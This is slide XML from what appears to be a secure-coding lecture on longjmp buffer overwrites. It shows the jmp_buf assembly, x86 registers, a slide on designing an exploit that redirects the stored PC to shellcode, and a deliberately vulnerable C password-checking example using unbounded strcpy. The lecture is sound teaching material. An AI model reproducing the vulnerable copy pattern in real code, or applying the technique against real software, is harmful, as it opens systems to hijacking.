                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>jmp_buf</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>[1];</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="0" hangingPunct="0">
              <a:spcBef>
                <a:spcPct val="0"/>
              </a:spcBef>
              <a:buFontTx/>
              <a:buNone/>
            </a:pPr>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779450494"/>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5" name="Text Box 3"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="304800" y="2000250"/>
            <a:ext cx="8839200" cy="369332"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="9525">
            <a:noFill/>
            <a:miter lim="800000"/>
            <a:headEnd/>
            <a:tailEnd/>
          </a:ln>
          <a:effectLst/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:prstTxWarp prst="textNoShape">
              <a:avLst/>
            </a:prstTxWarp>
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr eaLnBrk="0" hangingPunct="0"/>
            <a:endParaRPr lang="en-US">
              <a:latin typeface="Courier" charset="0"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1103876" name="Rectangle 4"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>jmp_buf Implementation</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1103877" name="Rectangle 5"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr eaLnBrk="0" hangingPunct="0">
              <a:spcBef>
                <a:spcPct val="0"/>
              </a:spcBef>
              <a:buFontTx/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0" err="1">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>longjmp</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>(</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-&gt;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="0" hangingPunct="0">
              <a:spcBef>
                <a:spcPct val="0"/>
              </a:spcBef>
              <a:buFontTx/>
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-US" sz="1600" dirty="0">
              <a:latin typeface="Consolas" charset="0"/>
              <a:ea typeface="Consolas" charset="0"/>
              <a:cs typeface="Consolas" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="0" hangingPunct="0">
              <a:spcBef>
                <a:spcPct val="0"/>
              </a:spcBef>
              <a:buFontTx/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0" err="1">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>movl</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eax</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>                    /* return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spcBef>
                <a:spcPct val="0"/>
              </a:spcBef>
              <a:buFontTx/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0" err="1">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>movl</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.__</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0" err="1">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>jmpbuf</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>[JB_BP], %</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0" err="1">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>ebp</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>  /* restore base </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0" err="1">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>ptr</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t> */</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="0" hangingPunct="0">
              <a:spcBef>
                <a:spcPct val="0"/>
              </a:spcBef>
              <a:buFontTx/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0" err="1">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>movl</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.__</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0" err="1">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>jmpbuf</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>[JB_SP], %</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0" err="1">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>esp</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>  /* restore stack </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0" err="1">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>ptr</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t> */</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="0" hangingPunct="0">
              <a:spcBef>
                <a:spcPct val="0"/>
              </a:spcBef>
              <a:buFontTx/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0" err="1">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>jmp</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.__</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0" err="1">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>jmpbuf</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>[JB_PC])      /* jump to stored PC */</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="203551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38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38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387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387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38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8" name="Rectangle 8"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>x86 Registers</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1003529" name="Rectangle 9"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" sz="half" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit fontScale="85000" lnSpcReduction="10000"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Two registers are used for high-speed memory transfer operations</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>esi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>si</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> (source), </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>edi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>/di (destination)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>There are several 32-bit special purpose registers</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>esp</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>sp</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>: the stack pointer</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>ebp</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>bp</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>: the frame </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>pointer</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1003531" name="Rectangle 11"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="4876800" y="302895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2" name="Rectangle 12"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="6781800" y="3028950"/>
            <a:ext cx="9906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ah</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1003533" name="Rectangle 13"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="7772400" y="3028950"/>
            <a:ext cx="9144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al</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1003534" name="Text Box 14"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="6477001" y="2272784"/>
            <a:ext cx="505267"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eax</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0">
              <a:latin typeface="Roboto Light"/>
              <a:cs typeface="Roboto Light"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1003535" name="Text Box 15"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="7467600" y="3644384"/>
            <a:ext cx="40267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a:latin typeface="Roboto Light"/>
                <a:cs typeface="Roboto Light"/>
              </a:rPr>
              <a:t>ax</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1003536" name="AutoShape 16"/>
          <p:cNvSpPr>
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm rot="16210247">
            <a:off x="7600950" y="295513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7" name="AutoShape 17"/>
          <p:cNvSpPr>
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm rot="-5400000">
            <a:off x="6667500" y="99060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8" name="Rectangle 18"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="4876800" y="480060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9" name="Rectangle 19"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="6781800" y="4800600"/>
            <a:ext cx="1905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41" name="Text Box 21"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="6461125" y="4044434"/>
            <a:ext cx="441146"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esi</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0">
              <a:latin typeface="Roboto Light"/>
              <a:cs typeface="Roboto Light"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1003542" name="Text Box 22"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="7451725" y="5416034"/>
            <a:ext cx="33855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si</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0">
              <a:latin typeface="Roboto Light"/>
              <a:cs typeface="Roboto Light"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1003543" name="AutoShape 23"/>
          <p:cNvSpPr>
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm rot="16210247">
            <a:off x="7524750" y="472678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44" name="AutoShape 24"/>
          <p:cNvSpPr>
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm rot="-5400000">
            <a:off x="6591300" y="276225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158977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35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4" name="Rectangle 4"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Designing an</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> Exploit</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1105925" name="Rectangle 5"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit lnSpcReduction="10000"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>If a long jump buffer can be overwritten by attacker-specified </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>data, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>it is possible to modify the control flow of an application</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>The exploit requires:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>A </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>setjmp(env</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>An overflow attack that overwrites </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>env</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Set  target PC value to start of shell code </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Set stored BP and SP so that shell code has legal memory area for stack operations</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>A call to </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>longjmp(env</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>x</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>)</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="193466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59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59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59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59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59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59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Make sure that sensitive data structures cannot be overwritten</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="203853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8" name="Rectangle 6"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit fontScale="90000"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>What is Overwritten: </a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>A Carefully (</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>?) Developed Program</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1201159" name="Rectangle 7"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="457200" y="1519178"/>
            <a:ext cx="8229600" cy="4525963"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr>
              <a:buFontTx/>
              <a:buNone/>
            </a:pP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checkpwd</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a:solidFill>
                  <a:schemeClr val="accent2"/>
                </a:solidFill>
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>p</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mypwd</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>[512];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strcpy</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0" err="1">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>mypwd</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>, p); /* creates copy of the password */                   </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buFontTx/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>  /* Performs the check on the copy... */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printf</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>("Checking password %s\n", </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0" err="1">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>mypwd</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return 0;                                                              </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buFontTx/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>}                                                                                                                                               </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buFontTx/>
              <a:buNone/>
            </a:pP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main</a:t>
            </a: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argc</a:t>
            </a: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argv</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 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent2"/>
                </a:solidFill>
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>username</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>[512];                                                    </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>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 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent2"/>
                </a:solidFill>
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>password</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>[512];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strncpy</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>(password, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0" err="1">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>argv</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>[1], 512);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strncpy</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>(username, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0" err="1">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>argv</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
